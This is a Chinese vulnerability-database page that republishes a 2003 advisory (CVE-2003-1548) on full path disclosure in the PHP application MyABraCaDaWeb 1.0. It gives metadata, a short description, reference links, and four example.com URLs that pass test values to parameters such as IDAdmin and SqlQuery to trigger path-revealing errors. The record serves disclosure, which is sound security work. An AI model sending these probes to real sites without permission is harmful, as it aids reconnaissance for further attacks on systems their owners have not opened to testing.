MyABraCaDaWeb 1.0 – Full Path Disclosure

MyABraCaDaWeb 1.0 – Full Path Disclosure

漏洞ID 1107241 漏洞类型
发布时间 2003-03-17 更新时间 2003-03-17
图片[1]-MyABraCaDaWeb 1.0 – Full Path Disclosure-安全小百科CVE编号 CVE-2003-1548
图片[2]-MyABraCaDaWeb 1.0 – Full Path Disclosure-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/22378
|漏洞详情
This vulnerability has been modified since it was last analyzed by the NVD. It is awaiting reanalysis which may result in further changes to the information provided.
|漏洞EXP
source: http://www.securityfocus.com/bid/7126/info

MyABraCaDaWeb is reported to disclose path information in error messages when handling some invalid requests. This information could be useful in further attacks against a system hosting the software.

http://www.example.com/index.php?IDAdmin=test

http://www.example.com/index.php?base=test

http://www.example.com/index.php?tampon=test

http://www.example.com/index.php?SqlQuery=test
|参考资料
resource:
hyperlink:http://securityreason.com/securityalert/3717
resource:Exploit
hyperlink:http://www.securityfocus.com/archive/1/archive/1/315317/30/25460/threaded
resource:Exploit
hyperlink:http://www.securityfocus.com/bid/7126
resource:Exploit
hyperlink:http://www.securitytracker.com/id?1006308
resource:
hyperlink:https://exchange.xforce.ibmcloud.com/vulnerabilities/11556

相关推荐: Trend Micro Virusbuster 2001 Remote Command Execution Vulnerability

Trend Micro Virusbuster 2001 Remote Command Execution Vulnerability 漏洞ID 1103493 漏洞类型 Input Validation Error 发布时间 2001-02-07 更新时间 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享